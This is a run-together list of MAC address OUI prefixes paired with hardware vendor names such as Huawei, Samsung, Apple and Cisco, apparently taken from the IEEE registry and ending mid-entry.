Fiberhome Telecommunication Technologies Co.,LTD B4CD27 HUAWEI TECHNOLOGIES CO.,LTD C819F7 Samsung Electronics Co.,Ltd 64C3D6 Juniper Networks 00A021 General Dynamics Mission Systems F0AF50 Phantom Intelligence C42C4F Qingdao Hisense Mobile Communication Technology Co,Ltd 24CACB Fiberhome Telecommunication Technologies Co.,LTD 543E64 Fiberhome Telecommunication Technologies Co.,LTD 6402CB ARRIS Group, Inc. F4E11E Texas Instruments 3880DF Motorola Mobility LLC, a Lenovo Company BC6A2F Henge Docks LLC 0C08B4 HUMAX Co., Ltd. 002705 Sectronic 48BD3D New H3C Technologies Co., Ltd 184C08 Rockwell Automation DC0265 Meditech Kft 180F76 D-Link International 14A72B currentoptronics Pvt.Ltd A4DA22 IEEE Registration Authority 3C1710 Sagemcom Broadband SAS DC729B HUAWEI TECHNOLOGIES CO.,LTD 909497 HUAWEI TECHNOLOGIES CO.,LTD 34029B Plexonics Technologies LImited 900372 Longnan Junya Digital Technology Co. Ltd. 84DB9E Aifloo AB 0CC6CC HUAWEI TECHNOLOGIES CO.,LTD 785860 HUAWEI TECHNOLOGIES CO.,LTD E8ABF3 HUAWEI TECHNOLOGIES CO.,LTD 3CDCBC Samsung Electronics Co.,Ltd 804E70 Samsung Electronics Co.,Ltd D4E6B7 Samsung Electronics Co.,Ltd 8C4CAD Evoluzn Inc. 8CF957 RuiXingHengFang Network (Shenzhen) Co.,Ltd 4C776D Cisco Systems, Inc 74E182 Texas Instruments 449EF9 vivo Mobile Communication Co., Ltd. 6CC4D5 HMD Global Oy 80C548 Shenzhen Zowee Technology Co.,Ltd 10C25A Technicolor CH USA Inc. E8DEFB MESOTIC SAS C400AD Advantech Technology (CHINA) Co., Ltd. 94FE9D SHENZHEN GONGJIN ELECTRONICS CO.,LT 6CB6CA DIVUS GmbH 04D13A Xiaomi Communications Co Ltd 4CC206 Somfy 040973 Hewlett Packard Enterprise 3499D7 Universal Flow Monitors, Inc. 0C8BD3 ITEL MOBILE LIMITED C0A8F0 Adamson Systems Engineering 9C431E IEEE Registration Authority 0024AF Dish Technologies Corp 282C02 IEEE Registration Authority FCA183 Amazon Technologies Inc. 6C2ACB Paxton Access Ltd 583BD9 Fiberhome Telecommunication Technologies Co.,LTD DCA266 Hon Hai Precision Ind. Co.,Ltd. C48466 Apple, Inc. 347C25 Apple, Inc. CC2DB7 Apple, Inc. A0BDCD BSkyB Ltd BC91B5 Infinix mobility limited 282FC2 Automotive Data Solutions 980074 Raisecom Technology CO., LTD 18C19D Integrated Device Technology (Malaysia) Sdn. Bhd. 0C9838 Xiaomi Communications Co Ltd 74EACB New H3C Technologies Co., Ltd D41A3F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D8B122 Juniper Networks B4C799 Extreme Networks, Inc. 646E6C Radio Datacom LLC E88E60 NSD Corporation 000F9B Ross Video Limited 0024BA Texas Instruments 60512C TCT mobile ltd 64DB81 Syszone Co., Ltd. 44AD19 XINGFEI (H.K)LIMITED 38ADBE New H3C Technologies Co., Ltd 5CAD76 Shenzhen TCL New Technology Co., Ltd 5C865C Samsung Electronics Co.,Ltd 04F128 HMD Global Oy 04B167 Xiaomi Communications Co Ltd EC8350 Microsoft Corporation D007CA Juniper Networks 1CDF52 Texas Instruments 30C507 ECI Telecom Ltd. C8458F Wyler AG 001BB9 Elitegroup Computer Systems Co.,Ltd. 002461 Shin Wang Tech. 0C5203 AGM GROUP LIMITED 2C5491 Microsoft Corporation 3817C3 Hewlett Packard Enterprise 001E1D East Coast Datacom, Inc. 7846C4 DAEHAP HYPER-TECH 5CE28C Zyxel Communications Corporation E4BD4B zte corporation 38D7CA 7HUGS LABS 000144 Dell EMC 08001B Dell EMC 7C010A Texas Instruments E42B34 Apple, Inc. 3C2EF9 Apple, Inc. A04EA7 Apple, Inc. F0989D Apple, Inc. FCD6BD Robert Bosch GmbH 701F53 Cisco Systems, Inc 18396E SUNSEA TELECOMMUNICATIONS CO.,LTD. EC7D11 vivo Mobile Communication Co., Ltd. 480EEC TP-LINK TECHNOLOGIES CO.,LTD. 503EAA TP-LINK TECHNOLOGIES CO.,LTD. 5800BB Juniper Networks 48BA4E Hewlett Packard D80831 Samsung Electronics Co.,Ltd 9441C1 Mini-Cam Limited 504EDC Ping Communication 08674E Hisense broadband multimedia technology Co.,Ltd 500F80 Cisco Systems, Inc 10F1F2 LG Electronics (Mobile Communications) 8C68C8 zte corporation EC8263 zte corporation 683C7D Magic Intelligence Technology Limited 0C1C20 Kakao Corp 24F5A2 Belkin International Inc. 74BBD3 Shenzhen xeme Communication Co., Ltd. 94282E New H3C Technologies Co., Ltd 98F5A9 OHSUNG D89EF3 Dell Inc. 384F49 Juniper Networks 4CBD8F Hangzhou Hikvision Digital Technology Co.,Ltd. ECEBB8 Hewlett Packard Enterprise 6CB749 HUAWEI TECHNOLOGIES CO.,LTD 989C57 HUAWEI TECHNOLOGIES CO.,LTD 185282 Fiberhome Telecommunication Technologies Co.,LTD 8C3C4A NAKAYO Inc 7086C1 Texas Instruments F4D7B2 LGS Innovations, LLC 00152A Nokia Corporation 9C4A7B Nokia Corporation D86162 Wistron Neweb Corporation 28840E silicon valley immigration service 80615F Beijing Sinead Technology Co., Ltd. 2CD2E7 Nokia Corporation 386EA2 vivo Mobile Communication Co., Ltd. 982D68 Samsung Electronics Co., Ltd BC2E48 ARRIS Group, Inc. 608CE6 ARRIS Group, Inc. 080070 Mitsubishi Precision Co.,LTd. 444AB0 Zhejiang Moorgen Intelligence Technology Co., Ltd DC6AEA Infinix mobility limited C421C8 KYOCERA CORPORATION 80739F KYOCERA CORPORATION 48EC5B Nokia 705812 Panasonic Corporation AVC Networks Company 04209A Panasonic Corporation AVC Networks Company 34008A IEEE Registration Authority A41115 Robert Bosch Engineering and Business Solutions pvt. Ltd. 40D63C Equitech Industrial(DongGuan)Co.,Ltd F4F3AA JBL GmbH & Co. KG 9050CA Hitron Technologies. Inc 409922 AzureWave Technology Inc. C06D1A Tianjin Henxinhuifeng Technology Co.,Ltd. 107B44 ASUSTek COMPUTER INC. 84253F silex technology, Inc. 0008C9 TechniSat Digital GmbH Daun D8B12A Panasonic Mobile Communications Co.,Ltd. B019C6 Apple, Inc. 3866F0 Apple, Inc. 008009 JUPITER SYSTEMS, INC. 00C064 General Datacomm LLC E86819 HUAWEI TECHNOLOGIES CO.,LTD 1CAB34 New H3C Technologies Co., Ltd 3C7843 HUAWEI TECHNOLOGIES CO.,LTD 5C0979 HUAWEI TECHNOLOGIES CO.,LTD E4FB5D HUAWEI TECHNOLOGIES CO.,LTD 0001CC Japan Total Design Communication Co., Ltd. 0030C8 GAD LINE, LTD. 0016E0 3Com Ltd D8DECE ISUNG CO.,LTD 703EAC Apple, Inc. 0011C0 Aday Technology Inc 0005F1 Vrcom, Inc. AC512C Infinix mobility limited 309935 zte corporation 0C72D9 zte corporation 1062D0 Technicolor CH USA Inc. 50642B XIAOMI Electronics,CO.,LTD 28401A C8 MediSensors, Inc. 30C01B Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 8886C2 STABILO International GmbH 08A8A1 Cyclotronics Power Concepts, Inc F4B520 Biostar Microtech international corp. CC2F71 Intel Corporate 001CC5 3Com Ltd 887A31 Velankani Electronics Pvt. Ltd. 8C0F6F PEGATRON CORPORATION 8C2505 HUAWEI TECHNOLOGIES CO.,LTD 8C3BAD NETGEAR 64CFD9 Texas Instruments 747D24 Phicomm (Shanghai) Co., Ltd. D09466 Dell Inc. 38E595 SHENZHEN GONGJIN ELECTRONICS CO.,LT BC9680 SHENZHEN GONGJIN ELECTRONICS CO.,LT A47B9D Espressif Inc. B8F8BE BLUECOM 002482 Ruckus Wireless 689234 Ruckus Wireless 50A733 Ruckus Wireless 2C5D93 Ruckus Wireless 38FF36 Ruckus Wireless 84183A Ruckus Wireless 24C9A1 Ruckus Wireless 7C2EDD Samsung Electronics Co.,Ltd 3CF7A4 Samsung Electronics Co.,Ltd 103034 Cara Systems 0000FE Annapolis Micro Systems, Inc. 00D01F Senetas Corporation Ltd E0CBBC Cisco Meraki 6447E0 Feitian Technologies Co., Ltd B44F96 Zhejiang Xinzailing Technology co., ltd 4C65A8 IEEE Registration Authority B0DFC1 Tenda Technology Co.,Ltd.Dongguan branch 9C6F52 zte corporation E86D65 AUDIO MOBIL Elektronik GmbH 706E6D Cisco Systems, Inc 604762 Beijing Sensoro Technology Co.,Ltd. BC1C81 Sichuan iLink Technology Co., Ltd. 900A1A Taicang T&W Electronics 506E92 Innocent Technology Co., Ltd. 30FE31 Nokia 98F2B3 Hewlett Packard Enterprise C4571F June Life Inc 886AE3 Alpha Networks Inc. 1C4D70 Intel Corporate D822F4 Avnet Silica 348F27 Ruckus Wireless 2C9EEC Jabil Circuit Penang 001CFA Alarm.com 60313B Sunnovo International Limited 6CB227 Sony Video & Sound Products Inc. 986F60 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 000CAB Commend International GmbH 745427 SHENZHEN FAST TECHNOLOGIES CO.,LTD 60720B BLU Products Inc 308976 DALIAN LAMBA TECHNOLOGY CO.,LTD 2C2617 Oculus VR, LLC 34D954 WiBotic Inc. 4857DD Facebook Inc 487D2E TP-LINK TECHNOLOGIES CO.,LTD. B0DAF9 ARRIS Group, Inc. 1835D1 ARRIS Group, Inc. C0A5DD SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 488D36 Arcadyan Corporation BCD713 Owl Labs E8E1E1 Gemtek Technology Co., Ltd. 28070D GUANGZHOU WINSOUND INFORMATION TECHNOLOGY CO.,LTD. 00A3D1 Cisco Systems, Inc FC4D8C SHENZHEN PANTE ELECTRONICS TECHNOLOGY CO., LTD FC06ED M2Motive Technology Inc. F0D4F6 Lars Thrane A/S F4A997 CANON INC. 64DFE9 ATEME 10C6FC Garmin International AC2205 Compal Broadband Networks, Inc. 80A036 Shanghai MXCHIP Information Technology Co., Ltd. F07485 NGD Systems, Inc. 405CFD Dell Inc. 20F452 Shanghai IUV Software Development Co. Ltd 509A4C Dell Inc. A0094C CenturyLink B43934 Pen Generations, Inc. 7426AC Cisco Systems, Inc B02628 Broadcom Limited 9874DA Infinix mobility limited 40B4F0 Juniper Networks 143F27 Noccela Oy 105887 Fiberhome Telecommunication Technologies Co.,LTD 704CA5 Fortinet, Inc. 9C061B Hangzhou H3C Technologies Co., Limited 50338B Texas Instruments 68262A SICHUAN TIANYI COMHEART TELECOMCO., LTD E8DE8E Integrated Device Technology (Malaysia) Sdn. Bhd. D8D866 SHENZHEN TOZED TECHNOLOGIES CO.,LTD. D8C06A Hunantv.com Interactive Entertainment Media Co.,Ltd. AC202E Hitron Technologies. Inc 9C32A9 SICHUAN TIANYI COMHEART TELECOMCO., LTD 1C5A0B Tegile Systems 046E02 OpenRTLS Group 900E83 Monico Monitoring, Inc. 601466 zte corporation 6854ED Alcatel-Lucent 680235 Konten Networks Inc. 38AC3D Nephos Inc E037BF Wistron Neweb Corporation E81367 AIRSOUND Inc. 001192 Cisco Systems, Inc 38F135 SensorTec-Canada AC7409 Hangzhou H3C Technologies Co., Limited C49DED Microsoft Corporation 98A40E Snap, Inc. F40343 Hewlett Packard Enterprise F093C5 Garland Technology 9810E8 Apple, Inc. C0D012 Apple, Inc. BCA920 Apple, Inc. 48A195 Apple, Inc. F80377 Apple, Inc. F49634 Intel Corporate 107D1A Dell Inc. 70AF24 TP Vision Belgium NV A41163 IEEE Registration Authority C4D197 Ventia Utility Services 2C86D2 Cisco Systems, Inc 7CE97C ITEL MOBILE LIMITED 8058F8 Motorola Mobility LLC, a Lenovo Company DCA4CA Apple, Inc. 8C8FE9 Apple, Inc. 70AF25 Nishiyama Industry Co.,LTD. E8D11B ASKEY COMPUTER CORP B8224F SICHUAN TIANYI COMHEART TELECOMCO., LTD 9800C1 GuangZhou CREATOR Technology Co.,Ltd.(CHINA) 54E1AD LCFC(HeFei) Electronics Technology co., ltd 98D3D2 MEKRA Lang GmbH & Co. KG 0C5F35 Niagara Video Corporation F8A34F zte corporation 001912 Welcat Inc 8C78D7 SHENZHEN FAST TECHNOLOGIES CO.,LTD B8EAAA ICG NETWORKS CO.,ltd B8F883 TP-LINK TECHNOLOGIES CO.,LTD. DCFE18 TP-LINK TECHNOLOGIES CO.,LTD. 704F57 TP-LINK TECHNOLOGIES CO.,LTD. B0C46C Senseit 0002A1 World Wide Packets 00E022 Analog Devices, Inc. 14B7F8 Technicolor CH USA Inc. 903D6B Zicon Technology Corp. B04089 Senient Systems LTD 5425EA HUAWEI TECHNOLOGIES CO.,LTD 3C7F6F Telechips, Inc. 5CBA37 Microsoft Corporation 00C0C6 PERSONAL MEDIA CORP. 28FECD Lemobile Information Technology (Beijing) Co., Ltd. C894BB HUAWEI TECHNOLOGIES CO.,LTD 10B1F8 HUAWEI TECHNOLOGIES CO.,LTD 089E08 Google, Inc. 00210D SAMSIN INNOTEC C87324Sow Cheng Technology Co. Ltd. 001F16 Wistron Corporation 00262D Wistron Corporation 0495E6 Tenda Technology Co.,Ltd.Dongguan branch 50E666 Shenzhen Techtion Electronics Co., Ltd. 0016D3 Wistron Corporation 4C4E03 TCT mobile ltd 908674 SICHUAN TIANYI COMHEART TELECOMCO., LTD 901711 Hagenuk Marinekommunikation GmbH 0010DE INTERNATIONAL DATACASTING CORPORATION C0D9F7 ShanDong Domor Intelligent S&T CO.,Ltd 00608B ConferTech International 702D84 i4C Innovations 2C200B Apple, Inc. 8866A5 Apple, Inc. 000277 Cash Systemes Industrie CCA219 SHENZHEN ALONG INVESTMENT CO.,LTD 4C1A3A PRIMA Research And Production Enterprise Ltd. 14B31F Dell Inc. ACC1EE Xiaomi Communications Co Ltd 5419C8 vivo Mobile Communication Co., Ltd. B0B98A NETGEAR 805A04 LG Electronics (Mobile Communications) 8CA5A1 Oregano Systems - Design & Consulting GmbH B8ECA3 Zyxel Communications Corporation BC8385 Microsoft Corporation 001438 Hewlett Packard Enterprise E4B005 Beijing IQIYI Science & Technology Co., Ltd. 000048 Seiko Epson Corporation B0E892 Seiko Epson Corporation AC1826 Seiko Epson Corporation A4EE57 Seiko Epson Corporation 9CAED3 Seiko Epson Corporation 707C69 Avaya Inc 500B91 IEEE Registration Authority F8461C Sony Interactive Entertainment Inc. 704D7B ASUSTek COMPUTER INC. 64A68F Zhongshan Readboy Electronics Co.,Ltd 38BC01 HUAWEI TECHNOLOGIES CO.,LTD 341E6B HUAWEI TECHNOLOGIES CO.,LTD 886639 HUAWEI TECHNOLOGIES CO.,LTD 00425A Cisco Systems, Inc 18DBF2 Dell Inc. 18F87A i3 International Inc. 4C26E7 Welgate Co., Ltd. 006041 Yokogawa Digital Computer Corporation C816A5 Masimo Corporation 0C0227 Technicolor CH USA Inc. 4C11BF Zhejiang Dahua Technology Co., Ltd. 2C598A LG Electronics (Mobile Communications) B05216 Hon Hai Precision Ind. Co.,Ltd. A0E4CB Zyxel Communications Corporation 284ED7 OutSmart Power Systems, Inc. 14A78B Zhejiang Dahua Technology Co., Ltd. A0B8F8 Amgen U.S.A. Inc. 884477 HUAWEI TECHNOLOGIES CO.,LTD 149D09 HUAWEI TECHNOLOGIES CO.,LTD 686975 Angler Labs Inc 20D25F SmartCap Technologies E47DBD Samsung Electronics Co.,Ltd 9CFBD5 vivo Mobile Communication Co., Ltd. 18F76B Zhejiang Winsight Technology CO.,LTD 583112 DRUST 9C83BF PRO-VISION, Inc. 78EF4C Unetconvergence Co., Ltd. 58696C Ruijie Networks Co.,LTD 48D343 ARRIS Group, Inc. 00C05A SEMAPHORE COMMUNICATIONS CORP. 0007F9 Sensaphone 001CB3 Apple, Inc. 407183 Juniper Networks C81B5C BCTech 5CE30E ARRIS Group, Inc. 1CC0E1 IEEE Registration Authority 001A39 Merten GmbH&CoKG FCECDA Ubiquiti Networks Inc. 00B0E1 Cisco Systems, Inc 005093 BOEING 905C44 Compal Broadband Networks, Inc. 44BA46 SICHUAN TIANYI COMHEART TELECOMCO.,LTD E07C13 zte corporation F41F88 zte corporation 14EDBB 2Wire Inc 18E29F vivo Mobile Communication Co., Ltd. 28EE52 TP-LINK TECHNOLOGIES CO.,LTD. 687251 Ubiquiti Networks Inc. B4FBE4 Ubiquiti Networks Inc. 707990 HUAWEI TECHNOLOGIES CO.,LTD A04E01 CENTRAL ENGINEERING co.,ltd. 28CA09 ThyssenKrupp Elevators (Shanghai) Co.,Ltd 842519 Samsung Electronics 5C2443 O-Sung Telecom Co., Ltd. 24920E Samsung Electronics Co.,Ltd FC4203 Samsung Electronics Co.,Ltd A01081 Samsung Electronics Co.,Ltd 3C8BCD Alcatel-Lucent Shanghai Bell Co., Ltd 4CF95D HUAWEI TECHNOLOGIES CO.,LTD 8421F1 HUAWEI TECHNOLOGIES CO.,LTD 00F22C Shanghai B-star Technology Co.,Ltd. 0005EE Vanderbilt International (SWE) AB F07960 Apple, Inc. A0D795 Apple, Inc. 0090E7 HORSCH ELEKTRONIK AG E43ED7 Arcadyan Corporation 5454CF PROBEDIGITAL CO.,LTD F8633F Intel Corporate 088620 TECNO MOBILE LIMITED F0D5BF Intel Corporate 6474F6 Shooter Detection Systems 981333 zte corporation 2047ED BSkyB Ltd 748A69 Korea Image Technology Co., Ltd BC4760 Samsung Electronics Co.,Ltd 04180F Samsung Electronics Co.,Ltd 2013E0 Samsung Electronics Co.,Ltd 002566 Samsung Electronics Co.,Ltd D0DB32 Nokia Corporation E80036 Befs co,. ltd C09F05 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5C4979 AVM Audiovisuelles Marketing und Computersysteme GmbH C0F945 Toshiba Toko Meter Systems Co., LTD. 70F8E7 IEEE Registration Authority D42C44 Cisco Systems, Inc 843DC6 Cisco Systems, Inc 002485 ConteXtream Ltd 28FCF6 Shenzhen Xin KingBrand enterprises Co.,Ltd 001F58 EMH Energiemesstechnik GmbH 689423 Hon Hai Precision Ind. Co.,Ltd. 844BF5 Hon Hai Precision Ind. Co.,Ltd. 08EDB9 Hon Hai Precision Ind. Co.,Ltd. 3C77E6 Hon Hai Precision Ind. Co.,Ltd. 70188B Hon Hai Precision Ind. Co.,Ltd. 5C6D20 Hon Hai Precision Ind. Co.,Ltd. 5CAC4C Hon Hai Precision Ind. Co.,Ltd. 0016DF Lundinova AB 001D0C MobileCompia B88EDF Zencheer Communication Technology Co., Ltd. DC7144 SAMSUNG ELECTRO MECHANICS CO., LTD. 980C82 SAMSUNG ELECTRO MECHANICS CO., LTD. A00BBA SAMSUNG ELECTRO MECHANICS CO., LTD. 606BBD Samsung Electronics Co.,Ltd 00214C Samsung Electronics Co.,Ltd 08C6B3 QTECH LLC 0018AF Samsung Electronics Co.,Ltd 001EE1 Samsung Electronics Co.,Ltd 00166B Samsung Electronics Co.,Ltd 0000F0 Samsung Electronics Co.,Ltd 8CC8CD Samsung Electronics Co.,Ltd A8F274 Samsung Electronics Co.,Ltd D487D8 Samsung Electronics Co.,Ltd 184617 Samsung Electronics Co.,Ltd 380A94 Samsung Electronics Co.,Ltd D0DFC7 Samsung Electronics Co.,Ltd D0C1B1 Samsung Electronics Co.,Ltd 8018A7 Samsung Electronics Co.,Ltd F47B5E Samsung Electronics Co.,Ltd 70F927 Samsung Electronics Co.,Ltd 34E71C Shenzhen YOUHUA Technology Co., Ltd 886AB1 vivo Mobile Communication Co., Ltd. 6C1E90 Hansol Technics Co., Ltd. 005A13 HUAWEI TECHNOLOGIES CO.,LTD C45006 Samsung Electronics Co.,Ltd 88329B SAMSUNG ELECTRO-MECHANICS(THAILAND) 1449E0 SAMSUNG ELECTRO-MECHANICS(THAILAND) D02544 SAMSUNG ELECTRO-MECHANICS(THAILAND) BC4486 Samsung Electronics Co.,Ltd 20D390 Samsung Electronics Co.,Ltd 9401C2 Samsung Electronics Co.,Ltd 50FC9F Samsung Electronics Co.,Ltd 380B40 Samsung Electronics Co.,Ltd B8FF61 Apple, Inc. 946124 Pason Systems F0728C Samsung Electronics Co.,Ltd 34AA8B Samsung Electronics Co.,Ltd 24DBED Samsung Electronics Co.,Ltd C8DE51IntegraOptics 98F058 Lynxspring, Incl. 68C44D Motorola Mobility LLC, a Lenovo Company 400D10 ARRIS Group, Inc. 943DC9 Asahi Net, Inc. 440444 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 00177E Meshcom Technologies Inc. A00460 NETGEAR 9884E3 Texas Instruments 38D269 Texas Instruments C8FD19 Texas Instruments 508CB1 Texas Instruments C4F5A5 Kumalift Co., Ltd. 70B14E ARRIS Group, Inc. 304487 Hefei Radio Communication Technology Co., Ltd 2C9D1E HUAWEI TECHNOLOGIES CO.,LTD 0081C4 Cisco Systems, Inc 58E876 IEEE Registration Authority D03742 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 001765 Nortel Networks 0015E8 Nortel Networks 00159B Nortel Networks 000F06 Nortel Networks 84B541 Samsung Electronics Co.,Ltd 006F64 Samsung Electronics Co.,Ltd DC6672 Samsung Electronics Co.,Ltd EC8EB5 Hewlett Packard 70AF6A SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. 20F543 Hui Zhou Gaoshengda Technology Co.,LTD E0DDC0 vivo Mobile Communication Co., Ltd. 00164D Alcatel-Lucent IPD 001AF0 Alcatel-Lucent IPD 38521A Nokia 001E40 Shanghai DareGlobal Technologies Co.,Ltd 94D723 Shanghai DareGlobal Technologies Co.,Ltd C4047B Shenzhen YOUHUA Technology Co., Ltd 20F41B Shenzhen Bilian electronic CO.,LTD FCFAF7 Shanghai Baud Data Communication Co.,Ltd. D826B9 Guangdong Coagent Electronics S&T Co.,Ltd. AC9CE4 Alcatel-Lucent Shanghai Bell Co., Ltd 00233E Alcatel-Lucent IPD 6CBEE9 Alcatel-Lucent IPD 001540 Nortel Networks 001ECA Nortel Networks 00130A Nortel Networks 001F0A Nortel Networks F8E61A Samsung Electronics Co.,Ltd A091C8 zte corporation 6CA858 Fiberhome Telecommunication Technologies Co.,LTD CC2D8C LG ELECTRONICS INC 98D6F7 LG Electronics (Mobile Communications) 700514 LG Electronics (Mobile Communications) E892A4 LG Electronics (Mobile Communications) 10683F LG Electronics (Mobile Communications) 40B0FA LG Electronics (Mobile Communications) 0025E5 LG Electronics (Mobile Communications) 0021FB LG Electronics (Mobile Communications) 34FCEF LG Electronics (Mobile Communications) BCF5AC LG Electronics (Mobile Communications) A84E3F Hitron Technologies. Inc 0C4885 LG Electronics (Mobile Communications) 0022A9 LG Electronics (Mobile Communications) 2C6A6F IEEE Registration Authority 08D833 Shenzhen RF Technology Co., Ltd A46032 MRV Communications (Networks) LTD 40667A mediola - connected living AG 68A0F6 HUAWEI TECHNOLOGIES CO.,LTD 000E5C ARRIS Group, Inc. 845DD7 Shenzhen Netcom Electronics Co.,Ltd 00B064 Cisco Systems, Inc 9C2A83 Samsung Electronics Co.,Ltd C80210 LG Innotek A039F7 LG Electronics (Mobile Communications) 1CCAE3 IEEE Registration Authority E4956E IEEE Registration Authority B437D1 IEEE Registration Authority 0055DA IEEE Registration Authority 78C2C0 IEEE Registration Authority 000EE8 Zioncom Electronics (Shenzhen) Ltd. 00C095 ZNYX Networks, Inc. 002025 CONTROL TECHNOLOGY, INC. 001A6B Universal Global Scientific Industrial Co., Ltd. 001641 Universal Global Scientific Industrial Co., Ltd. 0010C6 Universal Global Scientific Industrial Co., Ltd. 00247E Universal Global Scientific Industrial Co., Ltd. 00DD0A UNGERMANN-BASS INC. 683563 SHENZHEN LIOWN ELECTRONICS CO.,LTD. 004072 Applied Innovation Inc. 001938 UMB Communications Co., Ltd. 4439C4 Universal Global Scientific Industrial Co., Ltd. 402CF4 Universal Global Scientific Industrial Co., Ltd. 001E37 Universal Global Scientific Industrial Co., Ltd. 1C57D8 Kraftway Corporation PLC 002318 Toshiba B86B23 Toshiba 0008F1 Voltaire 00199D Vizio, Inc 00E08B QLogic Corporation D8EB97 TRENDnet, Inc. 001C7E Toshiba 002517 Venntis, LLC 00600F Westell Technologies Inc. 00183A Westell Technologies Inc. 6002B4 Wistron Neweb Corporation 94DF4E Wistron InfoComm(Kunshan)Co.,Ltd. 98EECB Wistron Infocomm (Zhongshan) Corporation 643AB1 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 001BFE Zavio Inc. 5410EC Microchip Technology Inc. 0004A3 Microchip Technology Inc. 789CE7 Shenzhen Aikede Technology Co., Ltd 509F3B OI ELECTRIC CO.,LTD 446EE5 HUAWEI TECHNOLOGIES CO.,LTD 88F7C7 Technicolor CH USA Inc. 8048A5 SICHUAN TIANYI COMHEART TELECOMCO.,LTD 683E34 MEIZU Technology Co., Ltd. C8778B Mercury Systems – Trusted Mission Solutions, Inc. 00044B NVIDIA AC9B0A Sony Corporation 104FA8 Sony Corporation 000B6B Wistron Neweb Corporation AC040B Peloton Interactive, Inc 48FCB6 LAVA INTERNATIONAL(H.K) LIMITED B0E235 Xiaomi Communications Co Ltd 40C729 Sagemcom Broadband SAS 14C913 LG Electronics F8A097 ARRIS Group, Inc. FC2325 EosTek (Shenzhen) Co., Ltd. FC3D93 LONGCHEER TELECOMMUNICATION LIMITED D8E0B8 BULAT LLC 603197 Zyxel Communications Corporation C0C976 Shenzhen TINNO Mobile Technology Corp. 588BF3 Zyxel Communications Corporation 5067F0 Zyxel Communications Corporation 001349 Zyxel Communications Corporation E09861 Motorola Mobility LLC, a Lenovo Company 9C8ECD Amcrest Technologies A009ED Avaya Inc 0014B4 General Dynamics United Kingdom Ltd A0B437GD Mission Systems 8C6D50 SHENZHEN MTC CO LTD 00F663 Cisco Systems, Inc A06090 Samsung Electronics Co.,Ltd BC765E Samsung Electronics Co.,Ltd E0A8B8 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited F45B73 Wanjiaan Interconnected Technology Co., Ltd B88198 Intel Corporate B0D7CC Tridonic GmbH & Co KG 2CDDA3 Point Grey Research Inc. 00809F ALE International 48C663 GTO Access Systems LLC 005F86 Cisco Systems, Inc 381DD9 FN-LINK TECHNOLOGY LIMITED 1CB9C4 Ruckus Wireless 8C59C3 ADB Italia B824F0 SOYO Technology Development Co., Ltd. D85B2A Samsung Electronics Co.,Ltd FCA89A Sunitec Enterprise Co.,Ltd 1C7B23 Qingdao Hisense Communications Co.,Ltd. 000BDE TELDIX GmbH CCD31E IEEE Registration Authority 34B354 HUAWEI TECHNOLOGIES CO.,LTD 1C6E76 Quarion Technology Inc 90C1C6 Apple, Inc. 6C0EE6 Chengdu Xiyida Electronic Technology Co,.Ltd CC500A Fiberhome Telecommunication Technologies Co.,LTD D046DC Southwest Research Institute 70A2B3 Apple, Inc. F40F24 Apple, Inc. 4C57CA Apple, Inc. 000763 Sunniwell Cyber Tech. Co., Ltd. 0062EC Cisco Systems, Inc CC167E Cisco Systems, Inc C46AB7 Xiaomi Communications Co Ltd 000AED HARTING Electronics GmbH 240A11 TCT mobile ltd D8E56D TCT mobile ltd 540593 WOORI ELEC Co.,Ltd C02FF1 Volta Networks E8A7F2 sTraffic 001F20 Logitech Europe SA 741F4A Hangzhou H3C Technologies Co., Limited E41D2D Mellanox Technologies, Inc. 0CDA41 Hangzhou H3C Technologies Co., Limited 74258A Hangzhou H3C Technologies Co., Limited A0B662 Acutvista Innovation Co., Ltd. E42F56 OptoMET GmbH F8DA0C Hon Hai Precision Ind. Co.,Ltd. 1C1B0D GIGA-BYTE TECHNOLOGY CO.,LTD. 48E9F1 Apple, Inc. 903809 Ericsson AB 00A006 IMAGE DATA PROCESSING SYSTEM GROUP C83F26 Microsoft Corporation 3497F6 ASUSTek COMPUTER INC. 50680A HUAWEI TECHNOLOGIES CO.,LTD 002238 LOGIPLUS 000C49 Dangaard Telecom Denmark A/S 0008B9 Kaonmedia CO., LTD. 60B387 Synergics Technologies GmbH A4D8CA HONG KONG WATER WORLD TECHNOLOGY CO. LIMITED 8019FE JianLing Technology CO., LTD 60B4F7 Plume Design Inc 487ADA Hangzhou H3C Technologies Co., Limited 001F45 Enterasys 001E90 Elitegroup Computer Systems Co.,Ltd. 0022B1 Elbit Systems Ltd. 0000B4 Edimax Technology Co. Ltd. 00168F GN Netcom A/S 000D87 Elitegroup Computer Systems Co.,Ltd. 1078D2 Elitegroup Computer Systems Co.,Ltd. 002197 Elitegroup Computer Systems Co.,Ltd. E4F3F5 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. A08CFD Hewlett Packard 000E03 Emulex Corporation 00CAE5 Cisco Systems, Inc 004268 Cisco Systems, Inc 4883C7 Sagemcom Broadband SAS 40163B Samsung Electronics Co.,Ltd 44650D Amazon Technologies Inc. D4F207 DIAODIAO(Beijing)Technology CO.,Ltd D4AD2D Fiberhome Telecommunication Technologies Co.,LTD F08CFB Fiberhome Telecommunication Technologies Co.,LTD 48555F Fiberhome Telecommunication Technologies Co.,LTD FC3F7C HUAWEI TECHNOLOGIES CO.,LTD 384C4F HUAWEI TECHNOLOGIES CO.,LTD 0CBF3F Shenzhen Lencotion Technology Co.,Ltd 50FF99 IEEE Registration Authority 84E323 Green Wave Telecommunication SDN BHD 705A9E Technicolor CH USA Inc. 04A316 Texas Instruments 140C5B PLNetworks 001706 Techfaithwireless Communication Technology Limited. FC084A FUJITSU LIMITED BC9889 Fiberhome Telecommunication Technologies Co.,LTD 24615A China Mobile Group Device Co.,Ltd. 405EE1 Shenzhen H&T Intelligent Control Co.,Ltd. 002578 JSC Concern Sozvezdie 30B49E TP-LINK TECHNOLOGIES CO.,LTD. C83870 Samsung Electronics Co.,Ltd 1C553A QianGua Corp. 34E70B HAN Networks Co., Ltd 007888 Cisco Systems, Inc 900325 HUAWEI TECHNOLOGIES CO.,LTD 98E7F5 HUAWEI 